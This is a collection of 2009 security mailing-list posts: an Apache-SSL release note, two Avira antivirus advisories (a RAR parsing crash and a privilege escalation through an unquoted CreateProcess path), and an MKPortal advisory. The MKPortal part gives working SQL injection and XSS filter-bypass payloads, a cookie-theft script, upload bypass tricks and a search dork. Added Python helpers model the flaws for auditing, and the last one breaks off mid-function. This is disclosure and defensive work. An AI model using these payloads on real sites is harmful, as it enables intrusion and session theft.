 From CHANGES.SSL:

Changed with Apache-SSL 1.3.41/1.60

   *) For some reason I switched on renegotiation, which broke
      things. For now, switched back off.
      [Ben Laurie]

The release will take a while to find its way to mirrors, which can
themselves be found here:

http://www.apache-ssl.org/

cheers,
Adam
-- 
Adam Laurie                         Tel: +44 (0) 20 7993 2690
Suite 117                           Fax: +44 (0) 1308 867 949
61 Victoria Road
Surbiton
Surrey                              mailto:adam@algroup.co.uk
KT6 4JX                             http://rfidiot.org

Date: Thu, 15 Jan 2009 16:13:07 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<vuln@secunia.com>, <cert@cert.org>, <nvd@nist.gov>, <cve@mitre.org>,
<vulndb@securityfocus.com>
Subject: Errata: [TZO-2009-1] Avira Antivir - RAR - Division by Zero &  Null Pointer Dereference

Errata :

Products listed but not affected :
AVIRA WebProtector for KEN! - Reason: Does not use the Scan Engine
Avira AntiVir Mobile - Reason: Does not use the same AV Engine

Avira requested the following products to be removed from the list,
for the reason that they are license models and not products per se,
it is arguable whether they should be listed or not, since the
licenses (most likely) include the vulnerable products:

AVIRA WebGate Suite - Reason: is a License Model
AVIRA SmallBusiness Suite -> Reason: is a License Model
AVIRA Business Bundle -> Reason: is a License Model
AVIRA AntiVir NetWork Bundle -> Reason: is a License Model
AVIRA AntiVir NetGate Bundle -> Reason: is a License Model
AVIRA AntiVir GateWay Bundle -> Reason: is a License Model
AVIRA AntiVir Campus (for Education) -> Reason: is a License Model

List of undisputed affected products :

Avira AntiVir Free
Avira AntiVir Premium
Avira Premium Security Suite
Avira AntiVir Professional
Avira AntiVir for KEN! 4
Avira AntiVir SharePoint
Avira AntiVir Virus Scan Adapter for SAP NetWeaver
Avira AntiVir MailGate
Avira MailGate Suite
Avira AntiVir Exchange
Avira AntiVir MIMEsweeper
Avira AntiVir Domino
Avira AntiVir WebGate
Avira WebGate Suite
Avira AntiVir ISA Server
Avira AntiVir MIMEsweeper



______________________________________________________________________

     Avira - RAR - Division by Zero & Null Pointer Dereference
______________________________________________________________________

Reference     : [TZO-2009-1]-Avira Antivir
Location      : http://blog.zoller.lu/2009/01/advisory-tzo-2009-1-avira-antivir-rar.html
Products      : Avira AntiVir Free
                Avira AntiVir Premium
                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper
                Avira AntiVir Domino
                Avira AntiVir WebGate
                Avira WebGate Suite
                Avira AntiVir ISA Server
                Avira AntiVir MIMEsweeper
                                
Vendors and Products using the Avira Engine :
Important : The impact of this flaw on those devices has not been
tested nor confirmed to exist, there is however reason to believe
that the flaw existed in these products as well.

http://www.avira.com/documents/utils/pdf/products/pi_system-integration_en.pdf

               AXIGEN Mail Server
               Clearswift Mimesweeper
               GeNUGate and GeNUGate Pro (optional addon)
               IQ.Suite                 

Vendor        : http://www.avira.de



I. Background
~~~~~~~~~~~~~
Avira is a leading worldwide provider of  self-developed  protection
solutions for professional and private use. The company  belongs  to
the pioneers in this  sector  with  over  twenty  years  experience.

The protection experts have numerous  company  locations  throughout
Germany and cultivate partnerships in  Europe,   Asia  and  America.
Avira has more than 180 employees at their main office  in  Tettnang
near Lake Constance and is one  of  the  largest  employers  in  the
region.  There  are  around  250  people  employed  worldwide  whose
commitment is continually being confirmed by awards.  A  significant
contribution to protection is the Avira AntiVir  Personal  which  is
being  used  by   private    users    a    million    times    over.

AV-Comparatives e.V.  have  chosen  Avira  AntiVir  Premium  as  the
best anti-virus solution of 2008 

II. Description
~~~~~~~~~~~~~~~
By manipulating certain fields inside a RAR archive an attacker
might trigger division by zero and null pointer exceptions. The
attack vector should be rated as remote as an attachment to an
e-mail is enough.

*Anybody else noticed that the amount of details in most
advisories has become less than useful?*


III. Impact
~~~~~~~~~~~
In some cases the impact is a Denial of Service condition, in
others an invalid read of size 4 bytes, which again in some
cases leads to a null pointer dereference.

The RAR parser inside the  module  leads  to  various  errors  whose
exploitability index is rated "I don't have time for this now  -  so
let's say 'maybe'" also sometimes known as "I lack the  time  and/or
the skill to do so". 


FAULTING_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0131cad9 (aepack!module_get_api+0x00020ed9)
   ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000268
Attempt to read from address 00000268

FAULTING_THREAD:  00000144
DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  avscan.exe
OVERLAPPED_MODULE: Address regions for 'AVREP' and 'rcimage.dll' overlap

READ_ADDRESS:  00000268 
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE
LAST_CONTROL_TRANSFER:  from 0131cb8c to 0131cad9

STACK_TEXT:  

0194f5fc 0131cb8c 0115bbfc 00000003 00000100 aepack!module_get_api+0x20ed9
0194f618 01319b96 0115bbfc 074cc4f4 00000002 aepack!module_get_api+0x20f8c
0194f654 0131a45a 00000010 01157160 00000001 aepack!module_get_api+0x1df96
0194f668 0131e7e0 000000d4 00f48ba8 011530d0 aepack!module_get_api+0x1e85a
0194f68c 01318c35 01157160 00000010 011530d0 aepack!module_get_api+0x22be0
00000000 00000000 00000000 00000000 00000000 aepack!module_get_api+0x1d035

FOLLOWUP_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

SYMBOL_NAME:  aepack!module_get_api+20ed9
MODULE_NAME: aepack
IMAGE_NAME:  aepack.dll
STACK_COMMAND:  ~2s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_aepack.dll!module_get_api
BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE_aepack!module_get_api+20ed9


IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
The Vulnerability notification policy I adhere to:
http://blog.zoller.lu/search/label/Vulnerability%20disclosure%20Policy


17/12/2008 : Sent notice to the correct mail address
security@avira.com

17/12/2008 : Avira acknowledges receipt

17/12/2008 : Avira sends details of  the  root  cause  on  the  same
day "The  crash  occurs  in  a  heavily  corrupted,   generated  RAR
archive while extracting the contents of the 22nd  file.   We  can't
give  any  file  names  as  they  are  non-printable  characters.  "

13/01/2009 : Avira notifies me that the  issue  was  fixed  with  an
update that shipped with AVPack 8.1.3.5  on  the  09/01/2009

14/01/2009 : Avira states that all products have been affected
except "Security Management Center" and the "Internet Update
Manager". "In principle that really means all products, except
products such as the Security Management Center or the Internet
Update Manager"

14/01/2009 : Release of this advisory 


Thierry Zoller
http://blog.zoller.lu

Date: Thu, 15 Jan 2009 18:43:00 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: [TZO-2009-2] Avira Antivir - Priviledge escalation

___________________________________________________________________

From  the 'cover-your-basics' and from the 'they-still-exist-department'
   Antivir insecure CreateProcess() usage - Privilege Escalation
                 and autostart as free bonus
___________________________________________________________________

Reference     : [TZO-2009-2]-Avira Antivir Privilege escalation
WWW           : http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html
Product       : AV7/AV8 desktop products :
                - Avira AntiVir Premium
                - Avira Premium Security Suite
                - Avira AntiVir Professional
Vendor        : http://www.avira.de


I. Background
~~~~~~~~~~~~~
Avira AntiVir is a reliable  free  antivirus  solution,   that
constantly and  rapidly  scans  your  computer  for  malicious
programs such as viruses, Trojans, backdoor programs,  hoaxes,
worms, dialers etc. Monitors  every  action  executed  by  the
user or the  operating  system  and  reacts  promptly  when  a
malicious program is detected.

The  protection  experts  have  numerous  company    locations
throughout  Germany  and  cultivate  partnerships  in  Europe,
Asia and America. Avira has more than 180 employees  at  their
main office in Tettnang near Lake  Constance  and  is  one  of
the largest employers in the region.   There  are  around  250
people employed  worldwide  whose  commitment  is  continually
being confirmed by  awards.   A  significant  contribution  to
protection is the Avira AntiVir Personal which is  being  used
by private users a million times over.

AV-Comparatives e.V. have  chosen  Avira  AntiVir  Premium  as
the best anti-virus solution of 2008 


II. Description
~~~~~~~~~~~~~~~
No funky IOCTL, just a plain unsafe call to CreateProcess().
In detail, the scheduler (sched.exe) running with SYSTEM
privileges calls the CreateProcess() API without enclosing
lpCommandLine in quotes to _regularly_ shell avwsc.exe.

Calling an executable with a path that has spaces in it and not
using quotes will trigger Windows to search for the
executable in various areas.

Calling for instance -  

 CreateProcess(
  NULL,
  c:\program files\avira\antivir PersonalEdition Classic\avwsc.exe,
  ...
  );
   
will first look for
c:\program.exe
and then
c:\program files\avira\antivir.exe

This is documented and intended behaviour as can be seen at : 
http://msdn.microsoft.com/en-us/library/ms682425.aspx

Quoting ms682425.aspx :
The lpApplicationName parameter can be NULL. In that case,
the module name must be the first white space-delimited
token in the lpCommandLine string. If you are using a long
file name that contains a space, use quoted strings to
indicate where the file name ends and the arguments begin;
otherwise, the file name is ambiguous. For example, consider
the string "c:\program files\sub dir\program name". This
string can be interpreted in a number of ways. The system
tries to interpret the possibilities in the following order:

c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name
c:\program files\sub dir\program name.exe

Pre-conditions for a CreateProcess() call to be insecure :
- lpApplicationName contains a NULL 
- the path in lpCommandLine contains white space
- the path in lpCommandLine is not enclosed in quotation marks

III. Impact
~~~~~~~~~~~
- Elevation of privileges from USER to SYSTEM  is  possible  
by  writing the payload  to c:\program files\avira\antivir.exe    
- Autostart vector - The payload will be executed even  after 
a reboot

IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
28/09/2008 : Contacted and sent bug report to Avira
28/09/2008 : Avira acknowledges receipt
01/10/2008 : Avira notifies me that the issue will be fixed
             with their next Emergency Update (EU2)
24/10/2008 : The update is pushed to customers
24/10/2008 : Avira notifies me that credits have been posted
             here: http://www1.avira.com/en/support/faq/details.html?id=419
15/01/2009 : Release of this advisory


References :
[1] http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038789.html
[2] CreateProcess() - http://msdn.microsoft.com/en-us/library/ms682425.aspx
[3] Book: Fuzzing - Brute force vulnerability discovery
[4] Loadlibrary() -  http://msdn.microsoft.com/en-us/library/ms684175(VS.85).aspx
If the string does not specify a path, the function uses a standard search strategy to find the file.
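
The search order described in sections II and III above, as an added example that is not part of the original advisory: a Python helper that lists every image CreateProcess() may try before the intended one when lpApplicationName is NULL, so an audit can confirm that none of those locations exists or is writable by unprivileged users. Function names are hypothetical; the command line is the one quoted in the advisory, and ntpath is used so the code runs on any OS.

```python
import ntpath

WHITESPACE = " \t"

# Command line quoted in the advisory (unquoted, contains spaces).
AVIRA_CMDLINE = r"c:\program files\avira\antivir PersonalEdition Classic\avwsc.exe"


def _with_default_ext(path):
    """CreateProcess appends .exe when the file name has no extension."""
    _, ext = ntpath.splitext(ntpath.basename(path))
    return path if ext else path + ".exe"


def candidate_images(command_line):
    """Ordered list of images tried when lpApplicationName is NULL."""
    cl = command_line.strip(WHITESPACE)
    if cl.startswith('"'):
        # A quoted module name has exactly one interpretation.
        end = cl.find('"', 1)
        return [_with_default_ext(cl[1:end] if end != -1 else cl[1:])]
    candidates = []
    for i, ch in enumerate(cl):
        # Every whitespace position is a possible end of the module name.
        if ch in WHITESPACE and cl[i - 1] not in WHITESPACE:
            candidates.append(_with_default_ext(cl[:i]))
    candidates.append(_with_default_ext(cl))
    return candidates


def hijack_candidates(command_line, intended_image):
    """Images that would be tried before the one the caller meant to run."""
    want = ntpath.normcase(intended_image)
    earlier = []
    for cand in candidate_images(command_line):
        if ntpath.normcase(cand) == want:
            return earlier
        earlier.append(cand)
    raise ValueError("intended image is not a prefix of the command line")


def is_insecure_call(application_name, command_line, intended_image):
    """True when all three pre-conditions from the advisory hold."""
    return application_name is None and bool(
        hijack_candidates(command_line, intended_image)
    )


if __name__ == "__main__":
    for path in hijack_candidates(AVIRA_CMDLINE, AVIRA_CMDLINE):
        print("must not exist or be user-writable:", path)
```

Passing the same path wrapped in double quotes, or supplying lpApplicationName, makes hijack_candidates() return an empty list.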


From - Thu Jan 15 15:52:49 2009
Date: Thu, 15 Jan 2009 11:43:55 -0700
Message-Id: <200901151843.n0FIhtOS024799@www3.securityfocus.com>
From: come2waraxe@yahoo.com
To: bugtraq@securityfocus.com
Subject: [waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1

[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1
=============================================================================
Author: Janek Vind "waraxe"
Date: 15. January 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-70.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MKPortal is a free Portal/Content Management System (CMS) which seamlessly
integrates with the most popular forum softwares. It uses the forum user
management system and other features and adds many powerful modules to create
and manage a light but powerful web site. MKPortal has an intuitive user
interface and is very simple to install and administer.

Homepage: http://www.mkportal.it/


List of found vulnerabilities
==============================================================================
1. Insecure file upload in blog personal gallery
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: critical
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges

Registered users with blog keeping privileges can access personal gallery
functionality, example URL:

http://localhost/mkportal.1.2.1/index.php?ind=blog&op=p_gal

They can also upload image files to the server. File uploading can be
dangerous without proper security checks. So let's have a closer look
at the source code of "modules/blog/index.php" line ~2452: 

---------------------[source code]---------------------
function upload_imm () {
global $mkportals, $DB, $mklib, $Skin, $_FILES;

..
$file =  $_FILES['FILE_UPLOAD']['tmp_name'];
$file_name =  $_FILES['FILE_UPLOAD']['name'];
//$file_type =  $_FILES['FILE_UPLOAD']['type'];
$peso =  $_FILES['FILE_UPLOAD']['size'];

if (!$file) {
$message = "{$mklib->lang['b_compfile']}";
$mklib->error_page($message);
exit;
}

//Validate file extension
$file_ext = preg_replace("`.*\.(.*)`", "\\1", $file_name);
$file_ext = substr ($file_name, (strlen($file_name)-3), 3);
$file_ext = strtolower($file_ext);

switch($file_ext)
{
case 'gif':
$ext = 'gif';
break;
case 'jpg':
$ext = 'jpg';
break;
case 'png':
$ext = 'png';
break;
case 'tif':
$ext = 'tif';
break;
case 'bmp':
$ext = 'bmp';
break;
default:
$ext = 'not_supported';
break;
}
if ($ext == "not_supported")  {
$message = "{$mklib->lang['b_gnotsup']}";
$mklib->error_page($message);
exit;
}

--------------------[/source code]---------------------

So this piece of code is supposed to let in only files with specific extensions.
In reality it will pass through files like "foobar.agif" or "whatever.pbmp" ...
Let's assume that we have a jpg picture named "pic.php.jjpg". This can be a valid
picture file and at the same time contain malicious php code inside.

What happens next:

---------------------[source code]---------------------
//Move file from server tmp directory to blog "tmp" directory
if (!move_uploaded_file("$file", "mkportal/blog/images/tmp/$file_name")) {
$message = "{$mklib->lang['b_nopermupl']}";
$mklib->error_page($message);
exit;
}
@chmod("mkportal/blog/images/tmp/$file_name", 0644);

//Validate by mime type
$tmpfilename = "mkportal/blog/images/tmp/$file_name";
$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size)  {
@unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
exit;
}
--------------------[/source code]---------------------

As this image file is a perfectly normal jpg picture, it will bypass
"getimagesize()" successfully. And "chmod()" will not make any difference in
this specific situation.

Next:

---------------------[source code]---------------------
$file_type = $size['mime'];

if (!$mklib->check_attach($file_type, $file_ext))  {
//Delete invalid file and display error
@unlink($tmpfilename);
$message .= "{$mklib->lang['b_gnotsup']}";
$mklib->error_page($message);
exit;
}

//Validate by file contents
$fcontents = file_get_contents ($tmpfilename);
$carray = array("html", "javascript", "vbscript", "alert",
 "onmouseover", "onclick", "onload", "onsubmit");
foreach ($carray as $fch) {
if (strstr($fcontents, $fch)) {
@unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
exit;
}
}
if (preg_match("#script(.+?)/script#ies", $fcontents)) {
@unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
exit;
}
--------------------[/source code]---------------------

Again, MIME-type will be correct and html-code detection can't stop
malicious php code inside of that jpg file. 

Finally:

---------------------[source code]---------------------
$image = $totr.$file_name;

//move file from "tmp" directory to "images" directory
@rename($tmpfilename, "mkportal/blog/images/$image");
--------------------[/source code]---------------------

What are the possibilities? An attacker can upload a picture file with php code
inside, with a filename like "pic.php.pjpg", and it will be stored on the remote
server as a result. And when the attacker issues a direct request to the uploaded
picture:

http://localhost/mkportal.1.2.1/mkportal/blog/images/1pic.php.pjpg

.. then in case of an Apache webserver the php code inside of the picture will
be executed. Therefore it's basically remote php code execution.


2. Insecure file upload in Downloads module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: critical
Preconditions:
 1. attacker must be registered user

Registered users can add new files in downloads module by default:

http://localhost/mkportal.1.2.1/index.php?ind=downloads&op=submit_file

Let's look at "mkportal/modules/Downloads/index.php" line ~662:

---------[source code]--------------------------
function add_file() {

     global $mkportals, $DB,  $_FILES, $mklib, $mklib_board;
..
//Replace illegal sub-extensions
$com_types = array('com', 'exe', 'bat', 'scr', 'pif', 'asp',
 'cgi', 'pl', 'php');
foreach ($com_types AS $bad) {
$file_name = str_replace(".$bad", "_$bad", $file_name);
---------[/source code]--------------------------

At first look this seems to be a good security measure. If we try to upload a
trojanized file with php code inside named "test.php.zzz", then it will be
transformed to "test_php.zzz" and php code execution is not possible.
But wait a minute ... "str_replace()" is case sensitive, right? So, what if
we try to upload "test.Php.zzz"? Yes, the code fragment above will not trigger and
we end up with a potentially dangerous uploaded file on the remote server. It's easy
to find out the URL to that file. First, let's look at the file's download link:

http://localhost/mkportal.1.2.1/index.php?ind=downloads&op=download_file&ide=3&file=test.Php.zzz

Here we can determine that "ide=3". And this is the direct file request URL:

http://localhost/mkportal.1.2.1/mkportal/modules/downloads/file/mk_3_test.Php.mk

And it appears that Apache does not care if it's "php" or "Php" or "PHP", it
will parse the file as a php script anyway. And as a result any registered user with
file adding rights in the downloads block can have arbitrary php code execution
possibilities on the remote server.


3. Race condition in multiple modules file upload functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. multiple tries needed for successful exploitation

Affected modules are Blog (gallery file upload), Reviews and Image Gallery.
For example let's look at Image Gallery's file upload code:

---------[source code]--------------------------
if (!$FILE_UPLOAD && $FILE_URL) {
//Copy file from remote server to gallery "tmp" directory
if (!copy("$file", "mkportal/modules/gallery/album/tmp/$file_name")) {
$message = "{$mklib->lang['ga_errorupl']}";
$mklib->error_page($message);
exit;
}
} else {
//Move file from local server tmp directory to gallery "tmp" directory
if (!move_uploaded_file("$file", "mkportal/modules/gallery/album/tmp/$file_name")) {
$message = "{$mklib->lang['ga_errorupl']}";
$mklib->error_page($message);
exit;
}
}
@chmod("mkportal/modules/gallery/album/tmp/$file_name", 0644);
..
//Validate by mime type
$tmpfilename = "mkportal/modules/gallery/album/tmp/$file_name";
$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size)  {
@unlink($tmpfilename);
$message .= "{$mklib->lang['ga_notsup']}";
$mklib->error_page($message);
exit;
}
---------[/source code]--------------------------

So there exists a timeframe where the temporary file is already moved to the "tmp"
directory, but it is not yet deleted. If an attacker manages to issue a request
like this

http://localhost/mkportal.1.2.1/mkportal/modules/Gallery/album/tmp/pic.php.pjpg

.. at the right time, then remote php code execution may be possible.
It is a classical race condition and the success probability of a single try is
very limited, but it's possible to make thousands of tries, until hitting
the jackpot. And by the way, "chmod(0644)" does not matter in this specific case :)


4. Sql Injection in Blog module template editing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges
 3. magic_quotes_gpc=off (rare in real-world servers)

Let's look at source code of "modules/blog/index.php" line ~1441:

---------------------[source code]---------------------
function save_template () {
global $mkportals, $DB, $Skin, $mklib;
..
$idb = $mkportals->member['id'];
$template = $_POST['template'];
$template = $this->clean_template($template);
$template2 = $_POST['template2'];
$template2 = $this->clean_template($template2);

$DB->query("UPDATE mkp_blog SET template = '$template',
 template2 = '$template2' WHERE id = '$idb'");
--------------------[/source code]---------------------

No "addslashes()" or "mysql_real_escape_string()" is used, so sql injection
is possible, if "magic_quotes_gpc" setting is "off".

Proof of concept:

a) Go to blog template editing interface:

http://localhost/mkportal.1.2.1/index.php?ind=blog&opit_template

b) Insert text into the "Home Template" textarea:

',template=@@version,template2='

.. and hit "Update Template". As a result the MySQL version is shown instead
of blog content.



5. Reflected XSS in "handler_image.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions: none

Example:

http://localhost/mkportal.1.2.1/mkportal/modules/rss/handler_image.php?i=<script>alert(123);</script>


6. Stored XSS in blog templates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges

MKportal offers blog functionality to all registered users. Blog access and
creation is enabled by default. Quick search in Google reveals, that many
websites have enabled blog module.

Google dork: inurl:"index.php?ind=blog"

Any registered user with blog editing privileges can modify his own
blog templates. Templates are stored in database. Blog owner can manipulate
templates html source in arbitrary ways, but some security filtering is
in place, in order to prevent inserting potentially malicious content
(Javascript, VBScript, ...) into blog templates.

Let's look at source code of "modules/blog/index.php" line ~1441:

---------------------[source code]---------------------
function save_template () {
global $mkportals, $DB, $Skin, $mklib;
..
$idb = $mkportals->member['id'];
$template = $_POST['template'];
$template = $this->clean_template($template);
$template2 = $_POST['template2'];
$template2 = $this->clean_template($template2);

$DB->query("UPDATE mkp_blog SET template = '$template',
 template2 = '$template2' WHERE id = '$idb'");
--------------------[/source code]---------------------

So we can see, that security filtering is handled by function
"clean_template()". Let's look inside of this function:

---------------------[source code]---------------------
function clean_template ($t="") {
..
while( preg_match( "#script(.+?)/script#ies", $t ) ) {
$t = preg_replace( "#script(.+?)/script#ies", "" , $t);
}
$t = preg_replace( "/javascript/i", "", $t );
//$t = preg_replace( "/about/i" , "", $t );
$t = preg_replace( "/vbscript/i" , "", $t );
$t = preg_replace( "/alert/i" , "", $t );
$t = preg_replace( "/onmouseover/i", "", $t );
$t = preg_replace( "/onclick/i" , "", $t );
$t = preg_replace( "/onload/i" , "", $t );
$t = preg_replace( "/onsubmit/i" , "", $t );

..
$t = preg_replace( "/ecmascript/i" , "", $t );
$t = preg_replace( "/about:/si" , "", $t );
$t = preg_replace( "/data:/si" , "", $t );
$t = preg_replace( "/onfocus/i" , "", $t );
$t = preg_replace( "/onblur/i" , "", $t );
$t = preg_replace( "/ondblclick/i" , "", $t );
$t = preg_replace( "/onmousedown/i" , "", $t );
$t = preg_replace( "/onmouseup/i" , "", $t );
$t = preg_replace( "/onmousemove/i" , "", $t );
$t = preg_replace( "/onmouseout/i" , "", $t );
$t = preg_replace( "/onkeypress/i" , "", $t );
$t = preg_replace( "/onkeydown/i" , "", $t );
$t = preg_replace( "/onkeyup/i" , "", $t );
$t = preg_replace( "/onunload/i" , "", $t );
$t = preg_replace( "/onabort/i" , "", $t );
$t = preg_replace( "/onerror/i" , "", $t );
$t = preg_replace( "/onchange/i" , "", $t );
$t = preg_replace( "/onreset/i" , "", $t );
$t = preg_replace( "/onselect/i" , "", $t );
$t = preg_replace( "/document\./i" , "", $t );
$t = preg_replace( "/window\./i" , "", $t );

..
return $t;
}

--------------------[/source code]---------------------

This kind of filtering is an example of a flawed-by-design implementation.
If someone wants to insert javascript into a blog template, then it's still
possible! Here are some working examples:

<body ononsubmitload=aleonsubmitrt(123);>

<salertcript>aalertlert(123);</salertcript>


7. Stored XSS in Reviews module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have Reviews comments editing privileges

There are some security measures against script injection in comments
text, but still it's possible to sneak through those filters. Example:

<marquee loop=1 onfinish=alert(document.cookie) width=0></marquee>

This script will be executed when someone opens a review with this comment.
As a result, cookie theft and other attacks may be possible.


8. Stored XSS in News module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have news comments editing privileges

Same story, as in previous case - filtering exists, but can be bypassed.



9. Full path disclosure in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions: display_errors = Off

Example:

http://localhost/mkportal.1.2.1/?ind[]

Result:

Warning: Illegal offset type in isset or empty in 
C:\apache_wwwroot\mkportal.1.2.1\index.php on line 102


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me! 


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ---------------------------------
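
Added example, not MKPortal code and not part of the original advisory: a Python model of the two filename checks quoted in sections 1 and 2 above, next to a stricter check that compares the whole final extension case-insensitively and stores the upload under a server-generated name. The function names and the storage-name scheme are assumptions; the sample file names are the ones used in the advisory plus one constructed benign name.

```python
import secrets

ALLOWED_IMAGE_EXT = {"gif", "jpg", "png", "tif", "bmp"}
# Sub-extensions the Downloads module tries to neutralise (from the advisory).
COM_TYPES = ["com", "exe", "bat", "scr", "pif", "asp", "cgi", "pl", "php"]


def blog_extension_check(file_name):
    """Model of the blog gallery check: only the last three characters count."""
    return file_name[-3:].lower() in ALLOWED_IMAGE_EXT


def downloads_rename(file_name):
    """Model of the Downloads check: str_replace() is case sensitive."""
    for bad in COM_TYPES:
        file_name = file_name.replace("." + bad, "_" + bad)
    return file_name


def strict_extension(file_name):
    """Return the allowlisted extension, or None.

    The whole text after the dot is compared (not its last three characters),
    the comparison is case-insensitive, and names with more than one
    dot-separated part after the base name are rejected outright.
    """
    base = file_name.replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return None
    return parts[1] if parts[1] in ALLOWED_IMAGE_EXT else None


def storage_name(file_name):
    """Server-generated name: no client-controlled text reaches the disk."""
    ext = strict_extension(file_name)
    if ext is None:
        raise ValueError("unsupported file name: %r" % file_name)
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    for name in ("pic.php.pjpg", "foobar.agif", "test.Php.zzz", "Holiday.JPG"):
        print(
            "%-14s blog=%-5s downloads=%-14s strict=%s"
            % (name, blog_extension_check(name), downloads_rename(name),
               strict_extension(name))
        )
```

The same strict check belongs before the file is moved anywhere under the web root, which also closes the window described in section 3.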

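
Added example for section 6 above, not MKPortal code and not part of the original advisory: a Python model of only the visible rules of clean_template() (the parts elided with ".." are not modelled), a regression check that looks for blocked tokens in the filter's own output, and a minimal allowlist sanitizer for contrast. The two sample inputs are the strings given in the advisory; the allowed tag and attribute sets are a constructed policy.

```python
import html
import re
from html.parser import HTMLParser

SCRIPT_RE = re.compile(r"script(.+?)/script", re.I | re.S)
# Tokens removed once each, in the order shown in the advisory.
STRIPPED = [
    "javascript", "vbscript", "alert", "onmouseover", "onclick", "onload",
    "onsubmit", "ecmascript", "about:", "data:", "onfocus", "onblur",
    "ondblclick", "onmousedown", "onmouseup", "onmousemove", "onmouseout",
    "onkeypress", "onkeydown", "onkeyup", "onunload", "onabort", "onerror",
    "onchange", "onreset", "onselect", "document.", "window.",
]

# The two inputs listed in the advisory.
SAMPLE_1 = "<body ononsubmitload=aleonsubmitrt(123);>"
SAMPLE_2 = "<salertcript>aalertlert(123);</salertcript>"


def clean_template_model(t):
    """Denylist filter: each token is deleted in a single pass."""
    while SCRIPT_RE.search(t):
        t = SCRIPT_RE.sub("", t)
    for token in STRIPPED:
        t = re.sub(re.escape(token), "", t, flags=re.I)
    return t


def residual_tokens(filtered):
    """Blocked tokens still present in output that was already filtered."""
    low = filtered.lower()
    found = [tok for tok in STRIPPED if tok in low]
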